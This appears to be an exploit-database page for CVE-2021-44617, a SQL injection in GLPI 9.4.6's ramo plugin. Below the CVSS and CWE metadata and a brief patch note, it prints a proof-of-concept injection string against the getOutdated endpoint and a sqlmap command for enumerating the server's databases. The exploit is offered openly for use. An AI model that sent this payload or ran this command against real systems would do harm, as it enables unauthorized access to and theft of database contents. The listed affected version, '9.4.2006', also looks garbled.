header-logo
Suggest Exploit
vendor:
GLPI
by:
Joas Antonio
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: GLPI
Affected Version From: 9.4.2006
Affected Version To: 9.4.2006
Patch Exists: YES
Related CWE: CVE-2021-44617
CPE: a:glpi-project:glpi:9.4.6
Metasploit:
Other Scripts:
Platforms Tested: Windows/Linux
2021

Baixar GLPI Project 9.4.6 – SQLi

This exploit is related to the Baixar GLPI Project 9.4.6. It is a SQL injection vulnerability that allows an attacker to execute malicious SQL queries on the vulnerable system. The exploit is triggered by sending a specially crafted request to the plugins/ramo/ramoapirest.php/getOutdated?idu=-1 endpoint. The attacker can then use the sqlmap tool to enumerate the databases on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their systems to the latest version of GLPI Project 9.4.6.
Source

Exploit-DB raw data:

# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi
# Date: 10/12
# Exploit Author: Joas Antonio
# Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/
# Software Link: https://glpi-project.org/pt-br/baixar/
# Version: GLPI - 9.4.6
# Tested on: Windows/Linux
# CVE : CVE-2021-44617

#POC1:
plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111

sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"

Navigation

Suggest Exploit

Services By CQR